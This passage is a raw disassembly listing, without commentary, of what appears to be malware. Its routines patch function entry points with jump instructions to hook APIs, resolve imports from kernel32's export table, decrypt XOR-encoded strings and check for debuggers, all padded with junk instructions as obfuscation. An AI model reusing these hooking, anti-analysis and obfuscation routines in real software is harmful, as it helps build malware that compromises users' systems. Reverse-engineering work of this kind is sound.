mov edx, [ebp+var_14]
mov ds:1[eax], edx
jmp short loc_4027B6
; ---------------------------------------------------------------------------
loc_402797: ; CODE XREF: sub_402639+9F�j
; sub_402639+AE�j ...
movzx eax, [ebp+var_9]
imul eax, 0Ch
cmp off_43C09C[eax], 0
jz short loc_4027B6
call sub_40C1B8 ; RtlGetLastWin32Error
add [ebp+var_9], 1
jmp loc_4026C0
; ---------------------------------------------------------------------------
loc_4027B6: ; CODE XREF: sub_402639+15C�j
; sub_402639+16D�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 4
jnz short loc_402829
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 4
jnz short loc_402829
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 4
jnz short loc_402829
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 4
jnz short loc_402829
mov edx, ebx
sub edx, 4
movzx edx, byte ptr [eax+edx]
cmp dl, 68h
jz short loc_4027FF
cmp edx, 0BEh
jz short loc_4027FF
mov edx, ebx
sub edx, 5
cmp byte ptr [eax+edx], 24h
jnz short loc_402829
loc_4027FF: ; CODE XREF: sub_402639+1B1�j
; sub_402639+1B9�j
lea edi, [ebp+var_A]
lea esi, byte_43C10E
xor ecx, ecx
inc ecx
rep movsb
mov eax, [ebp+arg_4]
add eax, [ebp+arg_8]
lea edx, [eax+ebx+5]
sub edx, 4
add eax, 7
mov ds:1[edx], eax
call sub_40C1B8 ; RtlGetLastWin32Error
loc_402829: ; CODE XREF: sub_402639+184�j
; sub_402639+18D�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 2
jnz loc_4028BC
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 2
jnz short loc_4028BC
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 2
jnz short loc_4028BC
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 2
jnz short loc_4028BC
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jz short loc_40286C
cmp eax, 0E9h
jnz short loc_4028BC
loc_40286C: ; CODE XREF: sub_402639+22A�j
call sub_40C188 ; GetCurrentProcessId
mov eax, [ebp+arg_4]
or edx, 0FFFFFFFFh
mov ecx, [ebp+arg_8]
lea ecx, [eax+ecx+5]
add ecx, ebx
sub ecx, 4
sub edx, ecx
add edx, eax
mov eax, edx
sub eax, 4
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_10]
mov ds:1[eax], edx
mov [ebp+var_C], 692Eh
movzx eax, [ebp+var_C]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_C], ax
loc_4028BC: ; CODE XREF: sub_402639+1F7�j
; sub_402639+204�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 1
jnz short loc_402924
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 1
jnz short loc_402924
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 1
jnz short loc_402924
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 1
jnz short loc_402924
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp al, 3Dh
jz short loc_4028FF
cmp eax, 0FEh
jz short loc_4028FF
cmp eax, 0FFh
jnz short loc_402924
loc_4028FF: ; CODE XREF: sub_402639+2B6�j
; sub_402639+2BD�j
call sub_40C1F4 ; GetProcessHeap
call sub_40C188 ; GetCurrentProcessId
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_8]
lea edi, [edi+esi+5]
add edi, ebx
sub edi, 4
mov ds:1[edi], eax
call sub_40C224 ; GetVersion
loc_402924: ; CODE XREF: sub_402639+28A�j
; sub_402639+293�j ...
inc ebx
cmp ebx, 400h
jb loc_402654
loc_402931: ; CODE XREF: sub_402639+60�j
pop edi
pop esi
pop ebx
leave
retn
sub_402639 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402936 proc near ; CODE XREF: sub_403010+318�p
var_30 = dword ptr -30h
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_21 = byte ptr -21h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
call sub_40C1F4 ; GetProcessHeap
call sub_40C218 ; GetTickCount
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_40297C
; ---------------------------------------------------------------------------
loc_402951: ; CODE XREF: sub_402936+51�j
call sub_40C1F4 ; GetProcessHeap
xor ebx, ebx
jmp short loc_402964
; ---------------------------------------------------------------------------
loc_40295A: ; CODE XREF: sub_402936+34�j
mov eax, [ebp+var_4]
cmp byte ptr [eax+ebx], 0
jnz short loc_40296C
inc ebx
loc_402964: ; CODE XREF: sub_402936+22�j
cmp ebx, 3E8h
jbe short loc_40295A
loc_40296C: ; CODE XREF: sub_402936+2B�j
call sub_40C218 ; GetTickCount
cmp ebx, 3E8h
jnb short loc_40298E
inc [ebp+var_4]
loc_40297C: ; CODE XREF: sub_402936+19�j
mov eax, [ebp+arg_4]
sub eax, 3E8h
cmp [ebp+var_4], eax
jbe short loc_402951
jmp loc_402B0D
; ---------------------------------------------------------------------------
loc_40298E: ; CODE XREF: sub_402936+41�j
add [ebp+var_4], 0Ah
movzx edi, [ebp+arg_8]
shl edi, 2
mov ebx, ds:dword_40F2F0[edi]
and [ebp+var_8], 0
loc_4029A4: ; CODE XREF: sub_402936+11B�j
mov eax, ebx
add eax, [ebp+var_8]
push eax
call sub_401DE8
pop ecx
mov eax, [ebp+var_8]
movzx eax, byte ptr [ebx+eax]
cmp eax, 0E8h
jz short loc_4029EE
cmp eax, 0E9h
jz short loc_4029EE
call sub_40C1F4 ; GetProcessHeap
and [ebp+var_C], 0
jmp short loc_4029E2
; ---------------------------------------------------------------------------
loc_4029D0: ; CODE XREF: sub_402936+B4�j
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov cl, [ebx+eax]
mov [edx+eax], cl
inc [ebp+var_C]
loc_4029E2: ; CODE XREF: sub_402936+98�j
mov eax, ds:dword_40DFC0
cmp [ebp+var_C], eax
jb short loc_4029D0
jmp short loc_402A45
; ---------------------------------------------------------------------------
loc_4029EE: ; CODE XREF: sub_402936+86�j
; sub_402936+8D�j
mov [ebp+var_30], 29E6h
add [ebp+var_30], 7F97h
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
mov cl, [ebx+eax]
mov [edx+eax], cl
call sub_40C1F4 ; GetProcessHeap
mov eax, [ebp+var_8]
lea eax, [ebx+eax+1]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
mov edx, [ebp+var_10]
mov ecx, [ebp+var_4]
add ecx, eax
sub edx, ecx
mov ecx, ebx
add ecx, eax
mov eax, edx
add eax, ecx
mov [ebp+var_1C], eax
call sub_40C218 ; GetTickCount
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
lea eax, [eax+edx+1]
mov edx, [ebp+var_1C]
mov [eax], edx
loc_402A45: ; CODE XREF: sub_402936+B6�j
mov eax, ds:dword_40DFC0
add [ebp+var_8], eax
cmp [ebp+var_8], 5
jb loc_4029A4
call sub_40C1F4 ; GetProcessHeap
mov eax, [ebp+var_8]
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_4]
add ecx, eax
sub edx, ecx
mov ecx, ebx
add ecx, eax
mov eax, edx
add eax, ecx
sub eax, 4
mov [ebp+var_10], eax
lea edi, [ebp+var_21]
lea esi, a@? ; "@~?^"
mov ecx, 5
rep movsb
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
mov byte ptr [edx+eax], 0E9h
lea edi, [ebp+var_28]
lea esi, aINW ; "I&n-*w"
mov ecx, 7
rep movsb
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
lea eax, [eax+edx+1]
mov edx, [ebp+var_10]
mov [eax], edx
mov [ebp+var_14], 1122h
inc [ebp+var_14]
or eax, 0FFFFFFFFh
sub eax, ebx
mov edx, [ebp+var_4]
mov ecx, [ebp+var_8]
lea edx, [edx+ecx+5]
add eax, edx
sub eax, 4
mov [ebp+var_10], eax
mov byte ptr [ebx], 0E9h
mov ds:1[ebx], eax
mov ax, word_43C11B
mov [ebp+var_2A], ax
push ecx
push [ebp+var_4]
movzx edi, [ebp+arg_8]
shl edi, 4
push off_43BE9C[edi]
call sub_402639
add esp, 0Ch
mov [ebp+var_18], 1FB2h
sub [ebp+var_18], 5E84h
loc_402B0D: ; CODE XREF: sub_402936+53�j
pop edi
pop esi
pop ebx
leave
retn
sub_402936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B12 proc near ; CODE XREF: sub_40A4E2+505�p
var_21C8 = dword ptr -21C8h
var_21C4 = dword ptr -21C4h
var_21C0 = word ptr -21C0h
var_21BE = word ptr -21BEh
var_21BC = byte ptr -21BCh
var_21B6 = word ptr -21B6h
var_21B4 = dword ptr -21B4h
var_21AE = byte ptr -21AEh
var_21AD = byte ptr -21ADh
var_21AC = dword ptr -21ACh
var_21A8 = dword ptr -21A8h
var_21A2 = byte ptr -21A2h
var_21A0 = dword ptr -21A0h
var_219A = dword ptr -219Ah
var_2194 = dword ptr -2194h
var_218F = byte ptr -218Fh
var_218E = word ptr -218Eh
var_218C = dword ptr -218Ch
var_2188 = dword ptr -2188h
var_2078 = dword ptr -2078h
var_2072 = byte ptr -2072h
var_205C = dword ptr -205Ch
var_2058 = dword ptr -2058h
var_2050 = byte ptr -2050h
var_2034 = dword ptr -2034h
var_2030 = dword ptr -2030h
var_2025 = byte ptr -2025h
var_2020 = dword ptr -2020h
var_101C = dword ptr -101Ch
var_1015 = byte ptr -1015h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 2594h
call sub_40C118
push ebx
push esi
push edi
call sub_40C1F4 ; GetProcessHeap
call sub_4022D1
mov [ebp+var_2058], 49FFh
inc [ebp+var_2058]
mov [ebp+var_2025], 0
call sub_40C224 ; GetVersion
cmp eax, 80000000h
jnb short loc_402B56
mov [ebp+var_2025], 1
loc_402B56: ; CODE XREF: sub_402B12+3B�j
lea edi, [ebp-2071h]
lea esi, aR_0 ; "`r_0"
mov ecx, 5
rep movsb
mov [ebp+var_1015], 0
loc_402B70: ; CODE XREF: sub_402B12+100�j
cmp [ebp+var_2025], 0
jnz short loc_402B8D
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43BEA0[edi], 1
jz short loc_402BAA
loc_402B8D: ; CODE XREF: sub_402B12+65�j
cmp [ebp+var_2025], 0
jz short loc_402BAC
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43BEA0[edi], 2
jnz short loc_402BAC
loc_402BAA: ; CODE XREF: sub_402B12+79�j
jmp short loc_402BF9
; ---------------------------------------------------------------------------
loc_402BAC: ; CODE XREF: sub_402B12+82�j
; sub_402B12+96�j
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43BE98[esi]
call sub_40C2C0 ; LoadLibraryA
mov ds:dword_413DB0[edi*4], eax
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43BE94[esi]
shl edi, 2
push ds:dword_413DB0[edi]
call sub_40C1E8 ; GetProcAddress
mov ds:dword_40F2F0[edi], eax
call sub_40C1B8 ; RtlGetLastWin32Error
loc_402BF9: ; CODE XREF: sub_402B12:loc_402BAA�j
add [ebp+var_1015], 1
movzx edi, [ebp+var_1015]
shl edi, 4
cmp off_43BE94[edi], 0
jnz loc_402B70
call sub_40C224 ; GetVersion
mov [ebp+var_1015], 0
loc_402C24: ; CODE XREF: sub_403010+394�j
movzx edi, [ebp+var_1015]
shl edi, 2
cmp ds:dword_40F2F0[edi], 0
jz loc_40338B
call sub_40C1F4 ; GetProcessHeap
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_413DB0[edi]
mov [ebp+var_2034], edi
cmp [ebp+var_2025], 0
jz loc_402F35
call sub_40C188 ; GetCurrentProcessId
call sub_402355
mov [ebp+var_2030], eax
shr edi, 16h
shl edi, 16h
mov [ebp+var_8], edi
mov [ebp+var_21A8], 787h
mov eax, [ebp+var_21A8]
mov edx, eax
add edx, eax
mov [ebp+var_21A8], edx
mov eax, edi
add eax, 400000h
mov [ebp+var_1014], eax
xor ebx, ebx
jmp short loc_402CE3
; ---------------------------------------------------------------------------
loc_402CA9: ; CODE XREF: sub_402B12+1DA�j
call sub_40C188 ; GetCurrentProcessId
mov eax, dword_43C004
add eax, 0FF8h
push eax
push [ebp+var_8]
call sub_40C29C ; IsBadReadPtr
mov [ebp+var_4], eax
call sub_40C218 ; GetTickCount
xor [ebp+var_4], 1
shl [ebp+var_4], 2
mov edi, [ebp+var_4]
mov [ebp+ebx*4+var_1010], edi
inc ebx
add [ebp+var_8], 1000h
loc_402CE3: ; CODE XREF: sub_402B12+195�j
mov eax, [ebp+var_1014]
cmp [ebp+var_8], eax
jbe short loc_402CA9
lea eax, [ebp+var_21A2]
push eax
call sub_40C278 ; GlobalMemoryStatus
mov [ebp+var_21AC], 315Fh
inc [ebp+var_21AC]
and [ebp+var_101C], 0
jmp loc_402E67
; ---------------------------------------------------------------------------
loc_402D16: ; CODE XREF: sub_402B12+366�j
lea edi, [ebp-21BBh]
lea esi, aQyg6 ; "QYG6"
mov ecx, 5
rep movsb
push 0FFFFh
push [ebp+var_101C]
push [ebp+var_2030]
call sub_4024F3
add esp, 0Ch
mov [ebp+var_C], eax
mov [ebp+var_21B6], 1E1Bh
movzx eax, [ebp+var_21B6]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_21B6], ax
cmp [ebp+var_C], 0
jnz short loc_402D8A
mov [ebp+var_21BE], 40D7h
movzx eax, [ebp+var_21BE]
imul eax, 78A8h
mov [ebp+var_21BE], ax
jmp loc_402E5D
; ---------------------------------------------------------------------------
loc_402D8A: ; CODE XREF: sub_402B12+254�j
and [ebp+var_21B4], 0
loc_402D91: ; CODE XREF: sub_403010+376�j
mov eax, [ebp+var_21B4]
mov [ebp+var_8], eax
jmp loc_402E36
; ---------------------------------------------------------------------------
loc_402D9F: ; CODE XREF: sub_402B12+32B�j
mov byte ptr [ebp+var_21BE+1], 0FDh
add byte ptr [ebp+var_21BE+1], 14h
xor ebx, ebx
loc_402DAF: ; CODE XREF: sub_402B12+2FE�j
mov [ebp+var_21C0], 4AA8h
movzx eax, [ebp+var_21C0]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_21C0], ax
mov edi, [ebp+var_8]
shr edi, 2
shl edi, 2
add edi, [ebp+var_C]
mov edi, [edi+ebx*4]
mov [ebp+var_4], edi
mov [ebp+var_21C4], 0AFDh
inc [ebp+var_21C4]
and [ebp+var_4], 4
mov edi, [ebp+ebx*4+var_1010]
cmp [ebp+var_4], edi
jnz short loc_402E12
mov eax, dword_43C127
mov [ebp+var_21C8], eax
inc ebx
cmp ebx, 400h
jb short loc_402DAF
loc_402E12: ; CODE XREF: sub_402B12+2EA�j
cmp ebx, 3FFh
jb short loc_402E2F
call sub_40C224 ; GetVersion
mov eax, [ebp+var_8]
add eax, 1000h
mov [ebp+var_21B4], eax
jmp short loc_402E9F
; ---------------------------------------------------------------------------
loc_402E2F: ; CODE XREF: sub_402B12+306�j
add [ebp+var_8], 1000h
loc_402E36: ; CODE XREF: sub_402B12+288�j
cmp [ebp+var_8], 0F000h
jbe loc_402D9F
push [ebp+var_C]
call sub_402563
pop ecx
lea edi, [ebp+var_21BC]
lea esi, byte_43C12B
xor ecx, ecx
inc ecx
rep movsb
loc_402E5D: ; CODE XREF: sub_402B12+273�j
add [ebp+var_101C], 10000h
loc_402E67: ; CODE XREF: sub_402B12+1FF�j
mov eax, [ebp+var_219A]
sub eax, 0FFFFh
cmp [ebp+var_101C], eax
jbe loc_402D16
push [ebp+var_2030]
call sub_40C1DC ; CloseHandle
lea edi, [ebp+var_21AD]
lea esi, byte_43C12C
xor ecx, ecx
inc ecx
rep movsb
jmp loc_40338B
; ---------------------------------------------------------------------------
loc_402E9F: ; CODE XREF: sub_402B12+31B�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_40F2F0[edi]
mov [ebp+var_1014], edi
and [ebp+var_1014], 0
loc_402EBD: ; CODE XREF: sub_402B12+421�j
lea edi, [ebp+var_21B6]
lea esi, aH@d8u ; "#h<@D8u"
movsd
movsd
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
mov esi, [esi+edi]
mov [ebp+edi+var_2020], esi
call sub_40C1F4 ; GetProcessHeap
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
add edi, esi
or byte ptr [edi], 2
mov [ebp+var_21AE], 0D6h
movzx eax, [ebp+var_21AE]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_21AE], al
inc [ebp+var_1014]
cmp [ebp+var_1014], 400h
jb short loc_402EBD
loc_402F35: ; CODE XREF: sub_402B12+14D�j
cmp [ebp+var_2025], 0
jnz loc_402FF8
mov [ebp+var_218E], 5C42h
movzx eax, [ebp+var_218E]
imul eax, 7CAFh
mov [ebp+var_218E], ax
push offset aKernel32_dll ; "kernel32.dll"
call sub_40C1D0 ; GetModuleHandleA
mov [ebp+var_2188], eax
mov edx, eax
add edx, ds:3Ch[eax]
mov [ebp+var_2194], edx
call sub_40C1F4 ; GetProcessHeap
mov eax, [ebp+var_2188]
mov edx, [ebp+var_2194]
add edx, 78h
add eax, [edx]
mov [ebp+var_219A+2], eax
mov [ebp+var_218C], 1261h
mov eax, [ebp+var_218C]
mov edx, eax
add edx, eax
mov [ebp+var_218C], edx
mov eax, [ebp+var_2188]
mov edx, [ebp+var_219A+2]
add edx, 1Ch
add eax, [edx]
mov [ebp-219Ch], eax
mov eax, [ebp+var_2188]
mov edx, [ebp-219Ch]
add eax, [edx]
mov [ebp+var_21A0], eax
mov [ebp+var_218F], 40h
add [ebp+var_218F], 0AEh
mov [ebp+var_2078], eax
call sub_40C2B4 ; IsDebuggerPresent
loc_402FF8: ; CODE XREF: sub_402B12+42A�j
push 1Ch
lea eax, [ebp+var_2050]
loc_403000: ; DATA XREF: .data:loc_43F3EE�r
; sub_43F411+8C�w ...
push eax
call sub_40C320 ; DATA XREF: .data:0043E449�r
; .data:loc_43E485�r ...
mov [ebp+var_205C], 595Eh ; DATA XREF: .data:0043E4A4�r
; .data:0043E572�w ...
sub_402B12 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403010 proc near ; DATA XREF: .data:0043E545�o
; sub_43F411+10�o
add dword ptr [ebp-205Ch], 5E98h
mov eax, [ebp-2034h]
mov [ebp-202Ch], eax
mov dword ptr [ebp-2060h], 3943h
inc dword ptr [ebp-2060h]
loc_403036: ; CODE XREF: sub_403010+73�j
; sub_403010+A5�j
push 1Ch
lea eax, [ebp-2050h]
push eax
push dword ptr [ebp-202Ch]
call sub_40C380 ; VirtualQuery
mov eax, [ebp-2034h]
cmp [ebp-204Ch], eax
jnz short loc_4030BA
mov word ptr [ebp-2062h], 1C82h
sub word ptr [ebp-2062h], 3C33h
mov eax, [ebp-2044h]
mov [ebp-2068h], eax
add [ebp-202Ch], eax
cmp byte ptr [ebp-2025h], 0
jnz short loc_403036
call sub_40C2B4 ; IsDebuggerPresent
push 20060000h
push 0
mov edi, [ebp-2068h]
shr edi, 0Ch
push edi
mov edi, [ebp-2050h]
shr edi, 0Ch
push edi
push 1000Dh
call dword ptr [ebp-2078h]
call sub_40C218 ; GetTickCount
jmp loc_403036
; ---------------------------------------------------------------------------
loc_4030BA: ; CODE XREF: sub_403010+46�j
movzx edi, byte ptr [ebp-1015h]
shl edi, 2
mov esi, [ebp-202Ch]
sub esi, [ebp-2034h]
mov ds:dword_411840[edi], esi
lea edi, [ebp-2080h]
lea esi, aMg6g_ox ; "mƒ6g.oX"
movsd
movsd
movzx edi, byte ptr [ebp-1015h]
shl edi, 2
mov edi, ds:dword_40F2F0[edi]
mov [ebp-1014h], edi
mov eax, dword_43C004
add eax, 0FF8h
push eax
push edi
call sub_40C2A8 ; IsBadWritePtr
mov [ebp-206Ch], eax
mov dword ptr [ebp-2054h], 7D39h
mov eax, [ebp-2054h]
mov edx, eax
add edx, eax
mov [ebp-2054h], edx
cmp dword ptr [ebp-206Ch], 0
jnz loc_403335
call sub_40C2B4 ; IsDebuggerPresent
cmp byte ptr [ebp+8], 0
jz loc_403314
mov dword ptr [ebp-2188h], 3864h
sub dword ptr [ebp-2188h], 3442h
mov eax, [ebp-1014h]
movzx eax, byte ptr [eax]
cmp eax, 0E9h
jz short loc_403191
call sub_40C224 ; GetVersion
cmp byte ptr [ebp+8], 1
jnz loc_403314
mov dword ptr [ebp-2594h], 439Eh
inc dword ptr [ebp-2594h]
jmp loc_403335
; ---------------------------------------------------------------------------
loc_403191: ; CODE XREF: sub_403010+15B�j
mov eax, [ebp-1014h]
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp-2024h], eax
mov byte ptr [ebp-2183h], 0
loc_4031B2: ; CODE XREF: sub_403010+238�j
sub dword ptr [ebp-2024h], 5
mov eax, [ebp-2024h]
mov [ebp-4], eax
loc_4031C2: ; CODE XREF: sub_403010+1EB�j
mov eax, [ebp-4]
mov edx, eax
dec edx
cmp byte ptr [edx], 0
jnz short loc_4031F3
mov edx, eax
sub edx, 2
cmp byte ptr [edx], 0
jnz short loc_4031F3
mov edx, eax
sub edx, 3
cmp byte ptr [edx], 0
jnz short loc_4031F3
mov edx, eax
sub edx, 4
cmp byte ptr [edx], 0
jnz short loc_4031F3
sub eax, 5
cmp byte ptr [eax], 0
jz short loc_4031FD
loc_4031F3: ; CODE XREF: sub_403010+1BB�j
; sub_403010+1C5�j ...
call sub_40C1B8 ; RtlGetLastWin32Error
dec dword ptr [ebp-4]
jmp short loc_4031C2
; ---------------------------------------------------------------------------
loc_4031FD: ; CODE XREF: sub_403010+1E1�j
movzx edi, byte ptr [ebp-2183h]
shl edi, 2
mov esi, [ebp-4]
mov [ebp+edi-258Ch], esi
add byte ptr [ebp-2183h], 1
movzx eax, byte ptr [esi]
cmp eax, 0E9h
jnz short loc_40324D
call sub_40C194 ; GetCurrentThreadId
mov eax, esi
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp-2024h], eax
mov eax, dword_43C13D
mov [ebp-2593h], eax
jmp loc_4031B2
; ---------------------------------------------------------------------------
loc_40324D: ; CODE XREF: sub_403010+210�j
mov ebx, [ebp-4]
jmp short loc_403275
; ---------------------------------------------------------------------------
loc_403252: ; CODE XREF: sub_403010+26B�j
call sub_40C194 ; GetCurrentThreadId
mov eax, [ebp-1014h]
add eax, ebx
sub eax, [ebp-4]
mov dl, [ebx]
mov [eax], dl
mov byte ptr [ebp-2590h], 0E6h
add byte ptr [ebp-2590h], 40h
inc ebx
loc_403275: ; CODE XREF: sub_403010+240�j
cmp ebx, [ebp-2024h]
jb short loc_403252
loc_40327D: ; CODE XREF: sub_403010+2DE�j
sub byte ptr [ebp-2183h], 1
movzx edi, byte ptr [ebp-2183h]
shl edi, 2
mov ebx, [ebp+edi-258Ch]
loc_403295: ; CODE XREF: sub_403010+2D3�j
mov byte ptr [ebx], 0
call sub_40C224 ; GetVersion
cmp byte ptr ds:1[ebx], 0
jnz short loc_4032CF
cmp byte ptr ds:2[ebx], 0
jnz short loc_4032CF
cmp byte ptr ds:3[ebx], 0
jnz short loc_4032CF
cmp byte ptr ds:4[ebx], 0
jnz short loc_4032CF
cmp byte ptr ds:5[ebx], 0
jz short loc_4032E5
loc_4032CF: ; CODE XREF: sub_403010+295�j
; sub_403010+29F�j ...
lea edi, [ebp-258Fh]
lea esi, byte_43C141
mov ecx, 3
rep movsb
inc ebx
jmp short loc_403295
; ---------------------------------------------------------------------------
loc_4032E5: ; CODE XREF: sub_403010+2BD�j
movzx eax, byte ptr [ebp-2183h]
or eax, eax
jg short loc_40327D
mov byte ptr [ebp-2189h], 0ECh
add byte ptr [ebp-2189h], 0F8h
cmp byte ptr [ebp+8], 1
jz short loc_403335
mov dword ptr [ebp-2190h], 5818h
inc dword ptr [ebp-2190h]
loc_403314: ; CODE XREF: sub_403010+133�j
; sub_403010+166�j
movzx eax, byte ptr [ebp-1015h]
push eax
push dword ptr [ebp-202Ch]
push dword ptr [ebp-2034h]
call sub_402936
add esp, 0Ch
call sub_40C2B4 ; IsDebuggerPresent
loc_403335: ; CODE XREF: sub_403010+124�j
; sub_403010+17C�j ...
cmp byte ptr [ebp-2025h], 0
jz short loc_40338B
call sub_40C2B4 ; IsDebuggerPresent
and dword ptr [ebp-1014h], 0
loc_40334A: ; CODE XREF: sub_403010+369�j
mov edi, [ebp-1014h]
shl edi, 2
mov esi, [ebp-8]
shr esi, 2
shl esi, 2
add esi, [ebp-0Ch]
mov edx, [ebp+edi-2020h]
mov [esi+edi], edx
inc dword ptr [ebp-1014h]
cmp dword ptr [ebp-1014h], 400h
jb short loc_40334A
mov eax, dword_43C144
mov [ebp-2186h], eax
jmp loc_402D91
; ---------------------------------------------------------------------------
loc_40338B: ; CODE XREF: sub_402B12+124�j
; sub_402B12+388�j ...
add byte ptr [ebp-1015h], 1
movzx edi, byte ptr [ebp-1015h]
shl edi, 4
cmp off_43BE94[edi], 0
jnz loc_402C24
mov ax, word_43C148
mov [ebp-2082h], ax
pop edi
pop esi
pop ebx
leave
retn
sub_403010 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033BC proc near ; CODE XREF: sub_40352B+54�p
; sub_4035A9+3D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 98h
push esi
push [ebp+arg_0]
mov eax, dword_43C154
lea eax, ds:41C850h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_403404
; ---------------------------------------------------------------------------
loc_4033EA: ; CODE XREF: sub_4033BC+4A�j
mov eax, dword_43C154
add eax, edi
lea eax, ds:41C850h[eax]
movsx edx, byte ptr [eax]
xor edx, 0A6h
mov [eax], dl
inc edi
loc_403404: ; CODE XREF: sub_4033BC+2C�j
cmp edi, esi
jl short loc_4033EA
mov eax, dword_43C154
add eax, esi
mov byte ptr ds:dword_41C850[eax], 0
mov edi, dword_43C154
mov eax, edi
add eax, 3
add eax, esi
mov dword_43C154, eax
inc dword_43C154
cmp dword_43C154, 0E02h
jle short loc_403442
and dword_43C154, 0
loc_403442: ; CODE XREF: sub_4033BC+7D�j
mov [ebp+var_8], 3E7h
lea eax, dword_41C850[edi]
pop edi
pop esi
leave
retn
sub_4033BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403453 proc near ; CODE XREF: sub_40352B+36�p
; sub_4035A9+26�p
var_1D = byte ptr -1Dh
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_F = byte ptr -0Fh
var_C = dword ptr -0Ch
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C188 ; GetCurrentProcessId
lea edi, [ebp+var_F]
lea esi, byte_43C158
mov ecx, 3
rep movsb
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_403479: ; CODE XREF: sub_403453+2B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_403479
mov edi, eax
mov [ebp+var_6], di
mov [ebp+var_C], 1A6Ch
mov eax, 4325h
mul [ebp+var_C]
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_C], eax
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_4034D1
; ---------------------------------------------------------------------------
loc_4034A8: ; CODE XREF: sub_403453+84�j
movzx eax, [ebp+var_2]
cmp byte ptr [ebx+eax], 5Ch
jnz short loc_4034CD
lea edi, [ebp+var_1D]
lea esi, aVp ; "$'vp"
mov ecx, 5
rep movsb
inc [ebp+var_2]
call sub_40C218 ; GetTickCount
jmp short loc_4034D9
; ---------------------------------------------------------------------------
loc_4034CD: ; CODE XREF: sub_403453+5D�j
dec [ebp+var_2]
loc_4034D1: ; CODE XREF: sub_403453+53�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_4034A8
loc_4034D9: ; CODE XREF: sub_403453+78�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_403516
mov [ebp+var_4], 0
jmp short loc_403504
; ---------------------------------------------------------------------------
loc_4034EB: ; CODE XREF: sub_403453+C1�j
movzx eax, [ebp+var_4]
mov edx, [ebp+arg_4]
movzx ecx, [ebp+var_2]
mov esi, eax
add esi, ecx
mov cl, [ebx+esi]
mov [edx+eax], cl
inc [ebp+var_4]
loc_403504: ; CODE XREF: sub_403453+96�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
